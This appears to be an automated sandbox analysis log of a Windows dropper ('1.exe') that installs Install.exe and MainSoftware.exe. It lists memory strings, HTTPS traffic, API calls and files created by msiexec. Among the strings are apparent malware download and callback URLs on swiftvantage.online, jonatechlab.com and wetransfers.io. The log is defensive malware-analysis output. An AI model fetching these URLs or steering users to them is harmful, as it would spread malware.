    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/download
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/info
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/sdk-not-foundProbing
    Source: Install.exeString found in binary or memory: https://aka.ms/nativeaot-c
    Source: MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7B7000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2453268537.0000020993E30000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2454027142.0000020995879000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455666591.0000024A2B101000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/FantasticFiasco/serilog-sinks-http.git
    Source: 1.exe, 00000000.00000003.1953629935.000000000C902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dot
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC7B000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000CC11000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C8F7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C7E7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000CC6C000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C986000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C859000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C843000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C7FB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C850000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C8EC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C7E0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000CBDF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000CC23000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000CBF4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C7C6000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C7F4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C7D8000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C981000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C932000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000CC29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
    Source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
    Source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/71847
    Source: MainSoftware.exe, 00000009.00000002.2457323456.0000024A2D227000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtimeE
    Source: MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5D5000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtimeGk
    Source: MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5D9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487355105.0000021DEA179000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtimet
    Source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/mono/linker/issues/378
    Source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/mono/linker/pull/649
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7A1000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2453861770.00000209957FD000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453952929.0000020995831000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453659363.0000020993F00000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482413470.0000021DE7EF0000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482321883.0000021DE7EC1000.00000020.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://github.com/serilog/serilog
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7B2000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2454007339.0000020995861000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453659363.0000020993F08000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://github.com/serilog/serilog-formatting-compact
    Source: MainSoftware.exe, 00000009.00000002.2454027142.0000020995870000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://github.com/serilog/serilog-sinks-file
    Source: MainSoftware.exe, 00000009.00000002.2454027142.0000020995870000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://github.com/serilog/serilog-sinks-fileC
    Source: MainSoftware.exe, 00000009.00000002.2453377610.0000020993E41000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453268537.0000020993E37000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://jonatechlab.com%/install/getfiles/
    Source: MainSoftware.exe, 00000009.00000002.2455615364.0000024A2AD00000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://jonatechlab.com/install/new
    Source: MainSoftware.exe, 00000009.00000002.2453377610.0000020993E41000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453268537.0000020993E37000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://jonatechlab.com/install/whattoinstall/Ghttps://jonatechlab.com/install/new
    Source: MainSoftware.exe, 00000009.00000002.2455615364.0000024A2AD00000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://jonatechlab.com/logs/telemetry
    Source: MainSoftware.exe, 00000009.00000002.2453377610.0000020993E41000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453268537.0000020993E37000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://jonatechlab.com/logs/telemetry-MyPersistentApp_Hourly
    Source: MainSoftware.exe, 00000009.00000002.2453377610.0000020993E41000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453268537.0000020993E37000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://jonatechlab.comH123e4567-e89b-12d3-a456-426614174000
    Source: 1.exe, 00000000.00000003.2577634988.0000000008483000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2589870919.0000000008487000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2552341866.0000000008AF0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1880749338.0000000004FB9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1881378531.0000000004FBA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2545951792.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://p1-ag5.pages.dev?source_id=1
    Source: 1.exe, 00000000.00000002.2589545091.0000000008460000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2581176945.000000000845F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1698765145.00000000084E9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1880749338.0000000004FB9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1881378531.0000000004FBA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2545951792.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.000000000501E000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1881434911.0000000004FCD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe
    Source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe1Surfclu
    Source: 1.exe, 00000004.00000002.2547718570.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exes
    Source: 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkg
    Source: 1.exe, 00000000.00000003.2581660176.00000000055DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2584665153.00000000055DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2580654380.00000000055DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkg4
    Source: Install.exe | String found in binary or memory: https://wetransfers.io/v.php
    Source: 1.exe, 00000000.00000002.2589385517.0000000008450000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ssl.
    Source: 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ssl.c8
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590533267.000000000A5B0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1699505082.0000000008501000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886296929.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2545951792.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1882325597.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2552341866.0000000008AFE000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ssl.com/repository0
    Source: unknown | Network traffic detected: HTTP traffic on port 49842 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49984
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknown | Network traffic detected: HTTP traffic on port 49970 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 50032 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49932 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50011
    Source: unknown | Network traffic detected: HTTP traffic on port 49961 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49984 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknown | Network traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49979
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49932
    Source: unknown | Network traffic detected: HTTP traffic on port 49900 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknown | Network traffic detected: HTTP traffic on port 49996 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49970
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50023
    Source: unknown | Network traffic detected: HTTP traffic on port 49876 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 50004 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49991 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49882 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49849
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49920
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49963
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49962
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49961
    Source: unknown | Network traffic detected: HTTP traffic on port 49844 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49882
    Source: unknown | Network traffic detected: HTTP traffic on port 50011 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50032
    Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 50001 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49963 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49979 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49876
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49952
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49996
    Source: unknown | Network traffic detected: HTTP traffic on port 49952 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49870
    Source: unknown | Network traffic detected: HTTP traffic on port 49944 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49991
    Source: unknown | Network traffic detected: HTTP traffic on port 49870 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50001
    Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50004
    Source: unknown | Network traffic detected: HTTP traffic on port 49962 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 50023 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49920 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49900
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49944
    Source: unknown | HTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:49740 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.6.210:443 -> 192.168.2.4:49842 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.6.210:443 -> 192.168.2.4:49844 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.59.228:443 -> 192.168.2.4:49882 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:49900 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49920 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:49932 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49944 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.59.228:443 -> 192.168.2.4:49952 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49961 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:49963 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49991 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:50001 version: TLS 1.2
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008915F0 SendMessageW,GetParent,GetWindowRect,GetParent,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,MapWindowPoints,FillRect,DeleteDC,SendMessageW,SendMessageW
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00902A40 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00768020 GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,NtdllDefWindowProc_W,GetWindowTextLengthW,GetWindowTextW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_007E4640 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_007687F0 SysFreeString,SysAllocString,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,GetWindowTextLengthW,GetWindowTextW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,SysFreeString
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00768EA0 NtdllDefWindowProc_W,GetSysColor
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00772FC0 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00781040 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0076B0A0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00773130 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0078F3F0 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0084F470 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0077B650 KillTimer,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0076B890 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0076BEF0 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00781040 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00768020 NtdllDefWindowProc_W,NtdllDefWindowProc_W,GlobalAlloc,GlobalLock,GlobalUnlock,NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_0076B0A0 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00773130 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_0078F3F0 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_0084F470 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_0077B650 NtdllDefWindowProc_W,DeleteCriticalSection
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_007E4640 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_0076B890 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_0076BEF0 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00768EA0 NtdllDefWindowProc_W
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00772FC0 NtdllDefWindowProc_W
    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\69b93f.msi
    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIBB04.tmp
    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIBBC0.tmp
    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIBC2F.tmp
    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIBC8D.tmp
    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\inprogressinstallinfo.ipi
    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\SourceHash{67AEF7BA-A109-4700-BE3F-0231069B1923}
    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID769.tmp
    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID78A.tmp
    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID7F8.tmp
    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID857.tmp
    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIE45E.tmp
    Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSIBB04.tmp
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_3_05645E39
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_3_05660A6C
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_3_056726D2
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008FA6E0
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008E2630
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00918DB0
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008CCF30
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008D1050
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00795360
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008BDB90
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00781CB0
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0091A030
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00910120
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_009184A0
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00782510
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0079A5E0
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008BA660
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_007987E0
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00964740
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_009228C0
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00904830
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00790B10
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00788C30
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00784D43
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00994D20
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00919220
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_007E9350
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_007533E0
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0096B350
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00787410
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_009A7439
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0079F4A0
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00751490
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0077D670
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00773670
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008C1690
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_007A76D0
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_009A1710
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00757A00
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_009A1A70
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00791D70
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0098BEEE
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00891E50
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00795360
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00751490
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00781CB0
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_0091A030
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00910120
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00919220
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_007E9350
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_007533E0
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_009184A0
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00787410
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_007A0480
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_0079F523
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00782510
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_0079A5E0
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00773670
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_0077D670
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_009A1710
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_007987E0
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_009228C0
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00757A00
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00790B10
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00788C30
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00791D70
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00918DB0
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00784D43
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_00891E50
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3D11580
